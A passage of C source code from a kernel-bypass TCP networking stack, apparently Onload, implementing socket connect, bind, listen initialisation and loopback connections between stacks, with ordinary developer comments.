ts->s.b.state == CI_TCP_SYN_SENT ) { ci_uint32 timeout = ts->s.so.sndtimeo_msec; ci_netif_poll(ni); if( OO_SP_NOT_NULL(ts->local_peer) ) { /* No reason to sleep. 
Obviously, listener have dropped our syn * because of some reason. Go away! */ ci_tcp_drop(ni, ts, EBUSY); RET_WITH_ERRNO(EBUSY); } #ifndef __KERNEL__ /* This "if" starts and ends with the stack being locked. It can * release the stack lock while spinning. */ if( oo_per_thread_get()->spinstate & (1 << ONLOAD_SPIN_TCP_CONNECT) ) { ci_uint64 start_frc, now_frc, schedule_frc; citp_signal_info* si = citp_signal_get_specific_inited(); ci_uint64 max_spin = ts->s.b.spin_cycles; int stack_locked = 1; if( ts->s.so.sndtimeo_msec ) { ci_uint64 max_so_spin = (ci_uint64)ts->s.so.sndtimeo_msec * IPTIMER_STATE(ni)->khz; if( max_so_spin <= max_spin ) max_spin = max_so_spin; } ci_frc64(&start_frc); schedule_frc = start_frc; now_frc = start_frc; do { if( ci_netif_may_poll(ni) ) { if( ci_netif_need_poll_spinning(ni, now_frc) ) { if( stack_locked || ci_netif_trylock(ni) ) { ci_netif_poll_n(ni, NI_OPTS(ni).evs_per_poll); ci_netif_unlock(ni); stack_locked = 0; } } else if( ! ni->state->is_spinner ) ni->state->is_spinner = 1; } if( ts->s.b.state != CI_TCP_SYN_SENT ) { ni->state->is_spinner = 0; if( ! stack_locked ) ci_netif_lock(ni); rc = 0; goto out; } /* Unlock the stack to allow kernel to process ICMP */ if( stack_locked ) { ci_netif_unlock(ni); stack_locked = 0; } ci_frc64(&now_frc); rc = OO_SPINLOOP_PAUSE_CHECK_SIGNALS(ni, now_frc, &schedule_frc, ts->s.so.sndtimeo_msec, NULL, si); if( rc != 0 ) { ni->state->is_spinner = 0; if( ! stack_locked ) ci_netif_lock(ni); goto out; } #if CI_CFG_SPIN_STATS ni->state->stats.spin_tcp_connect++; #endif } while( now_frc - start_frc < max_spin ); ni->state->is_spinner = 0; if( ! 
stack_locked ) ci_netif_lock(ni); if( timeout ) { ci_uint32 spin_ms = (start_frc - now_frc) / IPTIMER_STATE(ni)->khz; if( spin_ms < timeout ) timeout -= spin_ms; else { if( ts->s.b.state == CI_TCP_SYN_SENT ) rc = -EAGAIN; goto out; } } } #endif CI_TCP_SLEEP_WHILE(ni, ts, CI_SB_FLAG_WAKE_RX, timeout, ts->s.b.state == CI_TCP_SYN_SENT, &rc); } #ifndef __KERNEL__ out: #endif if( rc == -EAGAIN ) { LOG_TC(log( LNT_FMT "timeout on sleep: %d", LNT_PRI_ARGS(ni, ts), -rc)); if( ! (ts->tcpflags & CI_TCPT_FLAG_NONBLOCK_CONNECT) ) { ts->tcpflags |= CI_TCPT_FLAG_NONBLOCK_CONNECT; CI_SET_ERROR(rc, EINPROGRESS); } else CI_SET_ERROR(rc, EALREADY); return rc; } else if( rc == -EINTR ) { LOG_TC(log(LNT_FMT "connect() was interrupted by a signal", LNT_PRI_ARGS(ni, ts))); ts->tcpflags |= CI_TCPT_FLAG_NONBLOCK_CONNECT; CI_SET_ERROR(rc, EINTR); return rc; } /*! \TODO propagate the correct error code: CONNREFUSED, NOROUTE, etc. */ if( ts->s.b.state == CI_TCP_CLOSED ) { /* Bug 3558: * Set OS socket state to allow/disallow next bind(). * It is Linux hack. */ if( ts->s.b.sb_aflags & CI_SB_AFLAG_OS_BACKED ) { #ifdef __ci_driver__ CI_TRY(efab_tcp_helper_set_tcp_close_os_sock( netif2tcp_helper_resource(ni), S_SP(ts))); #else CI_TRY(ci_tcp_helper_set_tcp_close_os_sock(ni, S_SP(ts))); #endif } /* We should re-bind socket on the next use if the port was determined by * OS. */ if( ! (ts->s.s_flags & CI_SOCK_FLAG_PORT_BOUND) ) ts->s.s_flags |= CI_SOCK_FLAG_CONNECT_MUST_BIND; /* - if SO_ERROR is set, handle it and return this value; * - else if rx_errno is set, return it; * - else (TCP_RX_ERRNO==0, socket is CI_SHUT_RD) return ECONNABORTED */ if( (rc = ci_tcp_connect_handle_so_error(&ts->s)) == 0) rc = TCP_RX_ERRNO(ts) ? 
TCP_RX_ERRNO(ts) : ECONNABORTED; CI_SET_ERROR(rc, rc); ci_tcp_connect_drop_implicit_address(ts); return rc; } return 0; } #ifndef __KERNEL__ static int complete_deferred_bind(ci_netif* netif, ci_sock_cmn* s, ci_fd_t fd) { ci_uint16 source_be16 = 0; int rc; ci_assert_flags(s->s_flags, CI_SOCK_FLAG_DEFERRED_BIND); if( s->cp.sock_cp_flags & OO_SCP_BOUND_ADDR ) rc = __ci_tcp_bind(netif, s, fd, s->laddr, &source_be16, 0); else rc = __ci_tcp_bind(netif, s, fd, addr_any, &source_be16, 0); if(CI_LIKELY( rc == 0 )) { s->s_flags &= ~(CI_SOCK_FLAG_DEFERRED_BIND | CI_SOCK_FLAG_CONNECT_MUST_BIND); sock_lport_be16(s) = source_be16; s->cp.lport_be16 = source_be16; LOG_TC(log(NSS_FMT "Deferred bind returned " IPX_FMT " :%u", NSS_PRI_ARGS(netif, s), IPX_ARG(AF_IP(addr_any)), ntohs(sock_lport_be16(s)))); } else { LOG_U(ci_log("__ci_tcp_bind returned %d at %s:%d", CI_GET_ERROR(rc), __FILE__, __LINE__)); } return rc; } static int ci_tcp_retrieve_addr(ci_netif* netif, const struct sockaddr* serv_addr, ci_addr_t* dst_addr, ci_uint16* dst_port) { /* Address family is validated to be AF_INET or AF_INET6 earlier. 
*/
  const struct sockaddr_in* inaddr = (struct sockaddr_in*) serv_addr;
  *dst_addr = ci_get_addr(serv_addr);
  /* NOTE(review): the sockaddr_in cast is used to read the port even for
   * AF_INET6 -- presumably relies on sin_port/sin6_port sharing an offset;
   * confirm. */
  *dst_port = inaddr->sin_port;
  int rc = 0;

  /* Only perform DNAT off of init_net */
  if( netif->cplane_init_net != NULL ) {
    ci_addr_sh_t dnat_addr = CI_ADDR_SH_FROM_ADDR(*dst_addr);
    rc = cp_svc_check_dnat(netif->cplane_init_net, &dnat_addr, dst_port);
    *dst_addr = CI_ADDR_FROM_ADDR_SH(dnat_addr);
  }

  return rc;
}


/* Returns:
 *          0                  on success
 *
 *          CI_SOCKET_ERROR (and errno set)
 *                             this is a normal error that is returned to the
 *                             the application
 *
 *          CI_SOCKET_HANDOVER we tell the upper layers to handover, no need
 *                             to set errno since it isn't a real error
 */
int ci_tcp_connect(citp_socket* ep, const struct sockaddr* serv_addr,
                   socklen_t addrlen, ci_fd_t fd, int *p_moved)
{
  ci_sock_cmn* s = ep->s;
  ci_tcp_state* ts = &SOCK_TO_WAITABLE_OBJ(s)->tcp;
  int rc = 0, crc;
  ci_addr_t dst_addr;
  ci_uint16 dst_port;
  int /*bool*/ dnat;

  if( NI_OPTS(ep->netif).tcp_connect_handover )
    return CI_SOCKET_HANDOVER;

  /* Make sure we're up-to-date. */
  ci_netif_lock(ep->netif);
  CHECK_TEP(ep);
  ci_netif_poll(ep->netif);

  /*
   * 1. Check if state of the socket is OK for connect operation.
   */

 start_again:

  if( (rc = ci_tcp_connect_handle_so_error(s)) != 0) {
    CI_SET_ERROR(rc, rc);
    goto unlock_out;
  }

  if( s->b.state != CI_TCP_CLOSED ) {
    /* see if progress can be made on this socket before
    ** determining status  (e.g. non-blocking connect and connect poll)*/
    if( s->b.state & CI_TCP_STATE_SYNCHRONISED ) {
      if( ts->tcpflags & CI_TCPT_FLAG_NONBLOCK_CONNECT ) {
        /* Second connect() after a non-blocking connect completed: report
         * success once, then clear the flag. */
        ts->tcpflags &= ~CI_TCPT_FLAG_NONBLOCK_CONNECT;
        rc = 0;
        goto unlock_out;
      }
      if( serv_addr->sa_family == AF_UNSPEC )
        LOG_E(ci_log("Onload does not support TCP disconnect via "
                     "connect(addr->sa_family==AF_UNSPEC)"));
      CI_SET_ERROR(rc, EISCONN);
    }
    else if( s->b.state == CI_TCP_LISTEN ) {
#if CI_CFG_POSIX_CONNECT_AFTER_LISTEN
      CI_SET_ERROR(rc, EOPNOTSUPP);
#else
      if( ci_tcp_validate_sa(s->domain, serv_addr, addrlen) ) {
        /* Request should be forwarded to OS */
        rc = CI_SOCKET_HANDOVER;
        goto unlock_out;
      }
      if( serv_addr->sa_family == AF_UNSPEC ) {
        /* Linux does listen shutdown on disconnect (AF_UNSPEC) */
        ci_netif_unlock(ep->netif);
        rc = ci_tcp_shutdown(ep, SHUT_RD, fd);
        goto out;
      }
      else {
        /* Linux has curious error reporting in this case */
        CI_SET_ERROR(rc, EISCONN);
      }
#endif
    }
    else {
      /* Socket is in SYN-SENT state. Let's block for receiving SYN-ACK */
      ci_assert_equal(s->b.state, CI_TCP_SYN_SENT);
      if( s->b.sb_aflags & (CI_SB_AFLAG_O_NONBLOCK | CI_SB_AFLAG_O_NDELAY) )
        CI_SET_ERROR(rc, EALREADY);
      else
        goto syn_sent;
    }
    goto unlock_out;
  }

  /* Check if we've ever been connected. */
  if( ts->tcpflags & CI_TCPT_FLAG_WAS_ESTAB ) {
    CI_SET_ERROR(rc, EISCONN);
    goto unlock_out;
  }

  /*
   * 2. Check address parameter, if it's inappropriate for handover
   *    decision or handover should be done, try to to call OS and
   *    do handover on success.
   */

  if (
      /* Af first, check that address family and length is OK. */
      ci_tcp_validate_sa(s->domain, serv_addr, addrlen)
      /* Check for NAT.
       */
      || (dnat = ci_tcp_retrieve_addr(ep->netif, serv_addr, &dst_addr,
                                      &dst_port)) < 0
      /* rfc793 p54 if the foreign socket is unspecified return          */
      /* "error: foreign socket unspecified" (EINVAL), but keep it to OS */
      || CI_IPX_ADDR_IS_ANY(dst_addr)
      /* Zero destination port is tricky as well, keep it to OS */
      || dst_port == 0 )
    {
      rc = CI_SOCKET_HANDOVER;
      goto unlock_out;
    }

#if CI_CFG_IPV6
  if( CI_IPX_IS_LINKLOCAL(dst_addr) &&
      ci_sock_set_ip6_scope_id(ep->netif, s, serv_addr, addrlen, 1) ) {
    rc = CI_SOCKET_HANDOVER;
    goto unlock_out;
  }
#endif

  /* is this a socket that we can handle? */
  rc = ci_tcp_connect_check_dest(ep, dst_addr, dst_port);
  if( rc )  goto unlock_out;

  if( (ts->s.pkt.flags & CI_IP_CACHE_IS_LOCALROUTE) &&
      OO_SP_IS_NULL(ts->local_peer) ) {
    /* Try to connect to another stack; handover if can't */
    struct oo_op_loopback_connect op;
    op.dst_port = dst_port;
    op.dst_addr = dst_addr;
    /* this operation unlocks netif */
    rc = oo_resource_op(fd, OO_IOC_TCP_LOOPBACK_CONNECT, &op);
    if( rc < 0)
      return CI_SOCKET_HANDOVER;
    if( op.out_moved )
      *p_moved = 1;
    if( op.out_rc == -EINPROGRESS )
      RET_WITH_ERRNO( EINPROGRESS );
    else if( op.out_rc == -EAGAIN )
      RET_WITH_ERRNO(EAGAIN);
    else if( op.out_rc != 0 )
      return CI_SOCKET_HANDOVER;
    return 0;
  }

  if( dnat ) {
    /* Remember the pre-translation destination for getpeername() etc. */
    ts->s.s_flags |= CI_SOCK_FLAG_DNAT;
    ts->pre_nat.daddr_be32 = ci_get_addr(serv_addr);
    ts->pre_nat.dport_be16 = ((struct sockaddr_in*) serv_addr)->sin_port;
  }

  crc = ci_tcp_connect_ul_start(ep->netif, ts, fd, dst_addr, dst_port, &rc);
  if( crc != CI_CONNECT_UL_OK ) {
    switch( crc ) {
    case CI_CONNECT_UL_ALIEN_BOUND:
      rc = CI_SOCKET_HANDOVER;
      /* Fall through.
       */
    case CI_CONNECT_UL_FAIL:
      /* Check non-blocking */
      if( errno == EINPROGRESS ) {
        CI_TCP_STATS_INC_ACTIVE_OPENS( ep->netif );
      }
      goto unlock_out;
    case CI_CONNECT_UL_LOCK_DROPPED:
      goto out;
    case CI_CONNECT_UL_START_AGAIN:
      goto start_again;
    }
  }
  CI_TCP_STATS_INC_ACTIVE_OPENS( ep->netif );

 syn_sent:
  rc = ci_tcp_connect_ul_syn_sent(ep->netif, ts);

 unlock_out:
  ci_netif_unlock(ep->netif);
 out:
  if( rc == CI_SOCKET_HANDOVER && (s->s_flags & CI_SOCK_FLAG_DEFERRED_BIND) ) {
    /* Handing the socket over to the OS: the deferred bind must be done
     * first so the OS socket has the right local port. */
    int rc1 = complete_deferred_bind(ep->netif, &ts->s, fd);
    if( rc1 < 0 )
      return rc1;
  }
  return rc;
}
#endif

/* Initialise the shared state of a listening socket: listen-queue timer,
 * accept queue, listen bucket and the per-retransmit listenQ lists. */
int ci_tcp_listen_init(ci_netif *ni, ci_tcp_socket_listen *tls)
{
  int i;
  oo_p sp;

  /* In theory, we can avoid listenq_tid timer for loopback-only listening
   * socket, but then it becomes complicated to distinguish different kind
   * of sockets and clear the timer when needed only. */
  sp = TS_OFF(ni, tls);
  OO_P_ADD(sp, CI_MEMBER_OFFSET(ci_tcp_socket_listen, listenq_tid));
  ci_ip_timer_init(ni, &tls->listenq_tid, sp, "lstq");
  tls->listenq_tid.param1 = S_SP(tls);
  tls->listenq_tid.fn = CI_IP_TIMER_TCP_LISTEN;

  tls->acceptq_n_in = tls->acceptq_n_out = 0;
  tls->acceptq_put = CI_ILL_END;
  tls->acceptq_get = OO_SP_NULL;
  tls->n_listenq = 0;
  tls->n_listenq_new = 0;

  /* Allocate and initialise the listen bucket */
  tls->bucket = ci_ni_aux_alloc_bucket(ni);
  if( OO_P_IS_NULL(tls->bucket) )
    return -ENOBUFS;
  tls->n_buckets = 1;

  /* Initialise the listenQ. */
  for( i = 0; i <= CI_CFG_TCP_SYNACK_RETRANS_MAX; ++i ) {
    sp = TS_OFF(ni, tls);
    OO_P_ADD(sp, CI_MEMBER_OFFSET(ci_tcp_socket_listen, listenq[i]));
    ci_ni_dllist_init(ni, &tls->listenq[i], sp, "lstq");
  }

  /* Initialize the cache and pending lists for the EP-cache.
* See comment at definition for details */ LOG_EP (log ("Initialise cache and pending list for id %d", S_FMT(tls))); #if CI_CFG_FD_CACHING sp = TS_OFF(ni, tls); OO_P_ADD(sp, CI_MEMBER_OFFSET(ci_tcp_socket_listen, epcache.cache)); ci_ni_dllist_init(ni, &tls->epcache.cache, sp, "epch"); sp = TS_OFF(ni, tls); OO_P_ADD(sp, CI_MEMBER_OFFSET(ci_tcp_socket_listen, epcache.pending)); ci_ni_dllist_init(ni, &tls->epcache.pending, sp, "eppd"); sp = TS_OFF(ni, tls); OO_P_ADD(sp, CI_MEMBER_OFFSET(ci_tcp_socket_listen, epcache_connected)); ci_ni_dllist_init(ni, &tls->epcache_connected, sp, "epco"); sp = TS_OFF(ni, tls); OO_P_ADD(sp, CI_MEMBER_OFFSET(ci_tcp_socket_listen, epcache.fd_states)); ci_ni_dllist_init(ni, &tls->epcache.fd_states, sp, "ecfd"); tls->epcache.avail_stack = oo_ptr_to_statep (ni, &ni->state->passive_cache_avail_stack); tls->cache_avail_sock = ni->state->opts.per_sock_cache_max; #endif return 0; } #ifdef __KERNEL__ int ci_tcp_connect_lo_samestack(ci_netif *ni, ci_tcp_state *ts, oo_sp tls_id, int *stack_locked) { int crc, rc = 0; ci_assert(ci_netif_is_locked(ni)); *stack_locked = 1; ts->local_peer = tls_id; crc = ci_tcp_connect_ul_start(ni, ts, CI_FD_BAD, sock_ipx_raddr(&ts->s), ts->s.pkt.dport_be16, &rc); /* The connect is really finished, but we should return EINPROGRESS * for non-blocking connect and 0 for normal. */ if( crc == CI_CONNECT_UL_OK ) rc = ci_tcp_connect_ul_syn_sent(ni, ts); else if( crc == CI_CONNECT_UL_LOCK_DROPPED ) *stack_locked = 0; return rc; } /* c_ni is assumed to be locked on enterance and is always unlocked on * exit. 
*/ int ci_tcp_connect_lo_toconn(ci_netif *c_ni, oo_sp c_id, ci_addr_t dst, ci_netif *l_ni, oo_sp l_id) { ci_tcp_state *ts; ci_tcp_socket_listen *tls, *alien_tls; citp_waitable_obj *wo; citp_waitable *w; int rc; int stack_locked; ci_assert(ci_netif_is_locked(c_ni)); ci_assert(OO_SP_NOT_NULL(c_id)); ci_assert(OO_SP_NOT_NULL(l_id)); LOG_TC(log("%s: connect %d:%d to %d:%d", __FUNCTION__, c_ni->state->stack_id, OO_SP_TO_INT(c_id), l_ni->state->stack_id, OO_SP_TO_INT(l_id))); alien_tls = SP_TO_TCP_LISTEN(l_ni, l_id); if( (int)ci_tcp_acceptq_n(alien_tls) >= alien_tls->acceptq_max ) { ci_netif_unlock(c_ni); return -EBUSY; } /* In c_ni, create shadow listening socket tls (copy l_id) */ ts = ci_tcp_get_state_buf(c_ni); if( ts == NULL ) { ci_netif_unlock(c_ni); LOG_E(ci_log("%s: [%d] out of socket buffers", __FUNCTION__, NI_ID(c_ni))); return -ENOMEM; } /* init common tcp fields */ ts->s.so = alien_tls->s.so; ts->s.cp.ip_ttl = alien_tls->s.cp.ip_ttl; S_IPX_TCP_HDR(&ts->s)->tcp_source_be16 = S_IPX_TCP_HDR(&alien_tls->s)->tcp_source_be16; ts->s.domain = alien_tls->s.domain; ts->c = alien_tls->c; ts->c.tcp_defer_accept = OO_TCP_DEFER_ACCEPT_OFF; /* make sure nobody will ever connect to our "shadow" socket * except us */ ci_bit_set(&ts->s.b.sb_aflags, CI_SB_AFLAG_ORPHAN_BIT); ci_tcp_set_slow_state(c_ni, ts, CI_TCP_LISTEN); tls = SOCK_TO_TCP_LISTEN(&ts->s); /* no timer: */ tls->s.s_flags = alien_tls->s.s_flags | CI_SOCK_FLAG_BOUND_ALIEN; tls->acceptq_max = 1; rc = ci_tcp_listen_init(c_ni, tls); if( rc != 0 ) { citp_waitable_obj_free(c_ni, &tls->s.b); ci_netif_unlock(c_ni); return rc; } /* Connect c_id to tls */ ts = SP_TO_TCP(c_ni, c_id); rc = ci_tcp_connect_lo_samestack(c_ni, ts, tls->s.b.bufid, &stack_locked); /* We have to destroy the shadow listener in the connecting stack, * so we really need to get the stack lock. */ if( ! 
stack_locked ) { int rc1 = ci_netif_lock(c_ni); if( rc1 != 0 ) { /* we leak the shadow listener and a synrecv state, but so be it */ ci_log("%s([%d:%d] to [%d:%d]): leaking the shadow listener " "[%d:%d] rc=%d", __func__, c_ni->state->stack_id, OO_SP_TO_INT(c_id), l_ni->state->stack_id, OO_SP_TO_INT(l_id), c_ni->state->stack_id, tls->s.b.bufid, rc); /* rc is usually -ERESTARTSYS, and it does not help user */ return -ENOBUFS; } } /* Accept as from tls */ if( !ci_tcp_acceptq_not_empty(tls) ) { /* it is possible, for example, if ci_tcp_listenq_try_promote() failed * because there are no endpoints */ ci_tcp_listenq_drop_all(c_ni, tls); citp_waitable_obj_free(c_ni, &tls->s.b); ci_netif_unlock(c_ni); return -EBUSY; } w = ci_tcp_acceptq_get(c_ni, tls); ci_assert(w); LOG_TV(ci_log("%s: %d:%d to %d:%d shadow %d:%d accepted %d:%d", __FUNCTION__, c_ni->state->stack_id, OO_SP_TO_INT(c_id), l_ni->state->stack_id, OO_SP_TO_INT(l_id), c_ni->state->stack_id, tls->s.b.bufid, c_ni->state->stack_id, w->bufid)); ci_assert(w->state & CI_TCP_STATE_TCP); ci_assert(w->state != CI_TCP_LISTEN); /* Destroy tls. * NB: nobody could possibly connect to it, so no need to do proper * shutdown. 
*/ ci_assert_equal(ci_tcp_acceptq_n(tls), 0); ci_tcp_listenq_drop_all(c_ni, tls); citp_waitable_obj_free(c_ni, &tls->s.b); ci_netif_unlock(c_ni); /* Keep a port reference */ { tcp_helper_endpoint_t *l_ep, *a_ep; struct oo_file_ref* os_sock_ref; unsigned long lock_flags; l_ep = ci_trs_ep_get(netif2tcp_helper_resource(l_ni), l_id); a_ep = ci_trs_ep_get(netif2tcp_helper_resource(c_ni), W_SP(w)); spin_lock_irqsave(&l_ep->lock, lock_flags); os_sock_ref = l_ep->os_socket; ci_assert_equal(a_ep->os_port_keeper, NULL); if( os_sock_ref != NULL ) { os_sock_ref = oo_file_ref_add(os_sock_ref); os_sock_ref = oo_file_ref_xchg(&a_ep->os_port_keeper, os_sock_ref); spin_unlock_irqrestore(&l_ep->lock, lock_flags); if( os_sock_ref != NULL ) oo_file_ref_drop(os_sock_ref); } else { spin_unlock_irqrestore(&l_ep->lock, lock_flags); goto cleanup; } } /* lock l_ni: Check that l_id is the same socket it used to be */ /* create ref-sock in l_ni, put it into acc q */ if( ci_netif_lock(l_ni) != 0 ) goto cleanup; if( alien_tls->s.b.state != CI_TCP_LISTEN || (alien_tls->s.b.sb_aflags & CI_SB_AFLAG_ORPHAN) || S_IPX_TCP_HDR(&alien_tls->s)->tcp_source_be16 != TS_IPX_TCP(ts)->tcp_dest_be16 || (!CI_IPX_ADDR_IS_ANY(alien_tls->s.laddr) && !CI_IPX_ADDR_EQ(alien_tls->s.laddr, sock_ipx_raddr(&ts->s))) ) { ci_netif_unlock(l_ni); goto cleanup; } ci_bit_mask_set(&w->sb_aflags, CI_SB_AFLAG_TCP_IN_ACCEPTQ | CI_SB_AFLAG_ORPHAN); wo = citp_waitable_obj_alloc(l_ni); if( wo == NULL ) { ci_netif_unlock(l_ni); goto cleanup; } wo->waitable.state = CI_TCP_CLOSED; wo->waitable.sb_aflags |= CI_SB_AFLAG_MOVED_AWAY; wo->waitable.moved_to_stack_id = c_ni->state->stack_id; wo->waitable.moved_to_sock_id = W_SP(w); LOG_TC(log("%s: put to acceptq %d:%d referencing %d:%d", __func__, l_ni->state->stack_id, OO_SP_TO_INT(W_SP(&wo->waitable)), c_ni->state->stack_id, OO_SP_TO_INT(W_SP(w)))); ci_tcp_acceptq_put(l_ni, alien_tls, &wo->waitable); citp_waitable_wake_not_in_poll(l_ni, &alien_tls->s.b, CI_SB_FLAG_WAKE_RX); 
ci_netif_unlock(l_ni); return rc; cleanup: ci_assert(w->sb_aflags & CI_SB_AFLAG_ORPHAN); ci_bit_mask_clear(&w->sb_aflags, CI_SB_AFLAG_TCP_IN_ACCEPTQ | CI_SB_AFLAG_ORPHAN); efab_tcp_helper_close_endpoint(netif2tcp_helper_resource(c_ni), w->bufid); /* we can not guarantee c_ni lock, so we can' call * ci_tcp_drop(c_ni, ts). So, we return error; UL will handover * and close ts endpoint. */ return -EBUSY; } #endif #ifndef __KERNEL__ /* Set a reuseport bind on a socket. */ int ci_tcp_reuseport_bind(ci_sock_cmn* sock, ci_fd_t fd) { int rc; /* With legacy reuseport we delay the __ci_tcp_bind actions to avoid errors * when trying to re-use a port for the os socket, so won't have set the * PORT_BOUND flag yet. */ ci_assert(((sock->s_flags & CI_SOCK_FLAG_PORT_BOUND) != 0)); ci_assert_nequal(sock->s_flags & CI_SOCK_FLAG_REUSEPORT, 0); if ( (rc = ci_tcp_ep_reuseport_bind(fd, CITP_OPTS.cluster_name, CITP_OPTS.cluster_size, CITP_OPTS.cluster_restart_opt, CITP_OPTS.cluster_hot_restart_opt, sock_ipx_laddr(sock), sock_lport_be16(sock))) != 0 ) { errno = -rc; return -1; } return 0; } /* In this bind handler we just check that the address to which * are binding is either "any" or one of ours. */ int ci_tcp_bind(citp_socket* ep, const struct sockaddr* my_addr, socklen_t addrlen, ci_fd_t fd ) { ci_uint16 new_port; ci_addr_t addr; ci_sock_cmn* s = ep->s; ci_tcp_state* c = &SOCK_TO_WAITABLE_OBJ(s)->tcp; int rc = 0; CHECK_TEP(ep); ci_assert(ci_netif_is_locked(ep->netif)); /* Check if state of the socket is OK for bind operation. */ /* \todo Earlier (TS_TCP( epi->tcpep.state )->tcp_source_be16) is used. * What is better? */ if (my_addr == NULL) RET_WITH_ERRNO( EINVAL ); if (s->b.state != CI_TCP_CLOSED) RET_WITH_ERRNO( EINVAL ); if (c->tcpflags & CI_TCPT_FLAG_WAS_ESTAB) RET_WITH_ERRNO( EINVAL ); /* There should be address length check before address family validation to * match Linux errno value set in inet6_bind(). 
*/ if (s->domain == PF_INET6 && addrlen < SIN6_LEN_RFC2133) RET_WITH_ERRNO( EINVAL ); if( my_addr->sa_family != s->domain ) RET_WITH_ERRNO( EAFNOSUPPORT ); /* sin_port and sin6_port share tha same place in the sockaddr */ new_port = ((struct sockaddr_in*)my_addr)->sin_port; /* Bug 4884: Windows regularly uses addrlen > sizeof(struct sockaddr_in) * Linux is also relaxed about overlength data areas. */ if (s->domain == PF_INET && addrlen < sizeof(struct sockaddr_in)) RET_WITH_ERRNO( EINVAL ); #if CI_CFG_FAKE_IPV6 #if ! CI_CFG_IPV6 if( s->domain == PF_INET6 && !ci_tcp_ipv6_is_ipv4(my_addr) ) goto handover; #else if( s->domain == PF_INET6 && (s->s_flags & CI_SOCK_FLAG_V6ONLY) && CI_IP6_IS_V4MAPPED(&CI_SIN6(my_addr)->sin6_addr) ) goto handover; #endif #endif if( ((s->s_flags & CI_SOCK_FLAG_TPROXY) != 0) && (new_port == 0) ) { NI_LOG(ep->netif, USAGE_WARNINGS, "Sockets with IP_TRANSPARENT set must " "be explicitly bound to a port to be accelerated"); goto handover; } addr = ci_get_addr(my_addr); /* In scalable RSS mode accelerated 127.* sockets cause issues: * * with SO_REUSEPORT they would fail at listen * * without SO_REUSEPORT they would end up in non-rss stack degrading performance * with lock contention, epoll3 and accelerated loopback */ if( CI_IPX_IS_LOOPBACK(addr) && NI_OPTS(ep->netif).scalable_filter_enable != CITP_SCALABLE_FILTERS_DISABLE && ((NI_OPTS(ep->netif).scalable_filter_mode & (CITP_SCALABLE_MODE_PASSIVE | CITP_SCALABLE_MODE_RSS)) == (CITP_SCALABLE_MODE_PASSIVE | CITP_SCALABLE_MODE_RSS)) ) goto handover; if( ((s->s_flags & CI_SOCK_FLAG_TPROXY) != 0) && CI_IPX_ADDR_IS_ANY(addr) ) { NI_LOG(ep->netif, USAGE_WARNINGS, "Sockets with IP_TRANSPARENT set must " "be explicitly bound to an address to be accelerated"); goto handover; } /* Using the port number provided, see if we can do this bind */ if( CITP_OPTS.tcp_reuseports != 0 && new_port != 0 ) { struct ci_port_list *force_reuseport; CI_DLLIST_FOR_EACH2(struct ci_port_list, force_reuseport, link, 
(ci_dllist*)(ci_uintptr_t)CITP_OPTS.tcp_reuseports) { if( force_reuseport->port == new_port ) { int one = 1; if( ep->s->b.sb_aflags & CI_SB_AFLAG_OS_BACKED ) { ci_fd_t os_sock = ci_get_os_sock_fd(fd); ci_assert(CI_IS_VALID_SOCKET(os_sock)); rc = ci_sys_setsockopt(os_sock, SOL_SOCKET, SO_REUSEPORT, &one, sizeof(one)); ci_rel_os_sock_fd(os_sock); /* Fixme: shouldn't we handle errors? */ } else if( (s->s_flags & CI_SOCK_FLAG_TPROXY) == 0 ) { rc = ci_tcp_helper_os_sock_create_and_set(ep->netif, fd, s, SOL_SOCKET, SO_REUSEPORT, (char*)&one, sizeof(one)); } if( rc != 0 ) { log("%s: failed to set SO_REUSEPORT on OS socket: " "rc=%d errno=%d", __func__, rc, errno); } ep->s->s_flags |= CI_SOCK_FLAG_REUSEPORT; LOG_TC(log("%s "SF_FMT", applied legacy SO_REUSEPORT flag for port %u", __FUNCTION__, SF_PRI_ARGS(ep, fd), new_port)); } } } #if CI_CFG_IPV6 if( CI_IPX_IS_LINKLOCAL(addr) && ci_sock_set_ip6_scope_id(ep->netif, s, my_addr, addrlen, 0) ) goto handover; #endif CI_LOGLEVEL_TRY_RET(LOG_TV, __ci_tcp_bind(ep->netif, ep->s, fd, addr, &new_port, 1)); ep->s->s_flags |= CI_SOCK_FLAG_BOUND; #if CI_CFG_IPV6 ci_tcp_ipcache_convert(CI_ADDR_AF(addr), c); #endif ci_sock_cmn_set_laddr(ep->s, addr, new_port); ci_sock_set_raddr_port(s, addr_any, 0); LOG_TC(log(LPF "bind to "IPX_FMT":%u n_p:%u lp:%u", IPX_ARG(AF_IP(addr)), CI_BSWAP_BE16(((struct sockaddr_in*)my_addr)->sin_port), CI_BSWAP_BE16(new_port), CI_BSWAP_BE16(sock_lport_be16(s)))); return 0; handover: if( !(ep->s->b.sb_aflags & CI_SB_AFLAG_OS_BACKED) ) { rc = ci_tcp_helper_os_sock_create_and_set(ep->netif, fd, s, -1, 0, NULL, 0); if( rc < 0 ) RET_WITH_ERRNO(errno); } return CI_SOCKET_HANDOVER; } /* Set the socket to listen, the reorder buffer and txq become ** the listen state, and it is initialised ** \todo split this overlong function up! ** ** NOTE: [fd] is unused in the kernel version */ int ci_tcp_listen(citp_socket* ep, ci_fd_t fd, int backlog) { /* ** ?? error handling on possible fails not handled robustly... ** ?? 
Need to check port number is valid TODO */ /*! \todo If not bound then we have to be listening on all interfaces. * It's likely that we won't be coming through here as we have to * listen on the OS socket too! */ ci_tcp_state* ts; ci_tcp_socket_listen* tls; ci_netif* netif = ep->netif; ci_sock_cmn* s = ep->s; unsigned ul_backlog = backlog; int rc; int scalable; int will_accelerate; LOG_TC(log("%s "SK_FMT" listen backlog=%d", __FUNCTION__, SK_PRI_ARGS(ep), backlog)); CHECK_TEP(ep); scalable = ci_tcp_use_mac_filter_listen(netif, s, s->cp.so_bindtodevice); if( s->s_flags & CI_SOCK_FLAG_DEFERRED_BIND ) complete_deferred_bind(netif, s, fd); if( NI_OPTS(netif).tcp_listen_handover ) return CI_SOCKET_HANDOVER; /* We should handover if the socket is bound to alien address. */ will_accelerate = ~s->s_flags & CI_SOCK_FLAG_BOUND_ALIEN || scalable || ( netif->state->flags & CI_NETIF_FLAG_USE_ALIEN_LADDRS && ! CI_IPX_IS_LOOPBACK(sock_ipx_laddr(s)) ); if( !NI_OPTS(netif).tcp_server_loopback && ! will_accelerate ) return CI_SOCKET_HANDOVER; if( ul_backlog < 0 ) ul_backlog = NI_OPTS(netif).max_ep_bufs; else if( ul_backlog < NI_OPTS(netif).acceptq_min_backlog ) ul_backlog = NI_OPTS(netif).acceptq_min_backlog; if( s->b.state == CI_TCP_LISTEN ) { tls = SOCK_TO_TCP_LISTEN(s); ci_netif_lock(ep->netif); tls->acceptq_max = ul_backlog; if( (s->s_flags & 